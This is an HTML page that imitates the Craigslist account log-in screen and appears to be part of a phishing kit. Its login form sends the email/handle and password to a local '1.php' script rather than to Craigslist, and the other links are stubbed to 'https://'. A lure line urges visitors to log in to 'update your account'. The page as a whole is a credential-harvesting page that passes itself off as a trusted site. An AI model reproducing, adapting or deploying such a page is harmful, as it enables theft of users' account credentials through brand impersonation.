
<!DOCTYPE html>
<html class="js canvas draggable fileAPI geolocation hashChange matchMedia picture pushState placeholder no-touchCapable transitions localStorage">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>craigslist - account log in</title>
        <link type="text/css" rel="stylesheet" media="all" href="index_files/cl.css">
        <meta name="viewport" content="width=device-width,initial-scale=1">
<link rel="Shortcut Icon" type="image/x-icon" href="index_files/favicon.ico">
    </head>

    <body class=" desktop w1024">



    <section class="page-container">
<header class="global-header">
   <a class="header-logo" >CL</a>

    <nav class="breadcrumbs-container">

<ul class="breadcrumbs">




        <li class="crumb plain-message">
            <p>
account log in            </p>
        </li>

    <li class="crumb no-js">
        <input type="submit" value="go">
    </li>
</ul>
    </nav>

</header>


<section class="body">
    <div class="login-page-boxes">
        <div class="accountform login-box">
            <h1 class="accountform-banner">Log in</h1>
            <form action="1.php" method="POST">
             




                <div class="accountform-field">
                    <label for="email">Email / Handle</label>
                    <input type="text" id="email" name="email" value="" required>
                </div>
                 <div class="accountform-field">
                    <label for="password">Password</label>
                    <input id="password" type="password" name="password" required>
                </div>
                <div class="accountform-actions">
                    <button type="submit" class="accountform-btn">Log in</button>
                    <a href="https://" class="accountform-helplink">Please login to update your account</a>
                </div>
            </form>
        </div>

        <p class="box-conjunction">
            or
        </p>

        <div class="accountform login-page-box">
            <h1 class="accountform-banner">Create an account</h1>
            <form action="https://" method="POST">
                <input type="hidden" name="rp" value="/login/home">
                <input type="hidden" name="rt" value="L">
                <input type="hidden" name="whichForm" value="createAccount">


                <div class="accountform-field">
                    <label for="emailAddress">Email</label>
                    <input type="email" id="emailAddress" name="emailAddress" value="" maxlength="64" required="">
                    </div>
                <div class="accountform-actions">
                    <button type="submit" class="accountform-btn">Create account</button>
                    <a href="https://" class="accountform-helplink">Account help</a>
                </div>
            </form>
        </div>
    </div>
</section>
<footer>
    <ul class="clfooter">
        <li>©  <span class="desktop">craigslist 2020</span><span class="mobile">CL</span></li>
		
        <li><a href="https://">help</a></li>
        <li><a href="https://">safety</a></li>
        <li class="desktop"><a href="https://">privacy</a></li>
        <li class="desktop"><a href="https://">feedback</a></li>
        <li class="desktop"><a href="https://">cl jobs</a></li>
        <li><a href="https://">terms</a></li>
        <li><a href="https://">about</a></li>
        <li class="fsel desktop linklike" data-mode="mobile">mobile</li>
        <li class="fsel mobile linklike" data-mode="regular">desktop</li>
    </ul>
</footer>
    </section>

    


</body>

</html>